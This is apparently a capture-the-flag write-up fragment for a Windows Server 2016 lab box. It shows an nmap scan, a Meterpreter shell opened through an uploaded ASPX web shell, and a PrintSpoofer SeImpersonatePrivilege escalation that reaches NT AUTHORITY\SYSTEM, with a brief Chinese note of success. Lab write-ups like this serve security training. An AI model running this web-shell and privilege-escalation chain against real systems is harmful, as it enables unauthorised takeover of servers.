Nmap scan report for 10.10.102.75 Host is up (0.19s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2024-02-29T06:52:09+00:00 |_ssl-date: 2024-02-29T06:52:50+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=Relevant | Not valid before: 2024-02-28T06:42:21 |_Not valid after: 2024-08-29T06:42:21 49663/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-02-28T22:52:12-08:00 | smb2-time: | date: 2024-02-29T06:52:10 |_ start_date: 2024-02-29T06:42:37 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
meterpreter > shell Process 1556 created. Channel 2 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
c:\Users\Bob\Desktop>cd c:/inetpub/wwwroot/nt4wrksv cd c:/inetpub/wwwroot/nt4wrksv
c:\inetpub\wwwroot\nt4wrksv>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5
Directory of c:\inetpub\wwwroot\nt4wrksv
02/29/2024 06:44 AM <DIR> . 02/29/2024 06:44 AM <DIR> .. 07/25/2020 07:15 AM 98 passwords.txt 02/29/2024 06:44 AM 27,136 PrintSpoofer64.exe 02/29/2024 06:34 AM 1,014,999 shell.aspx 3 File(s) 1,042,233 bytes 2 Dir(s) 21,043,695,616 bytes free
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe PrintSpoofer64.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved.
成功提权
1 2 3
PS C:\Windows\system32> whoami whoami nt authority\system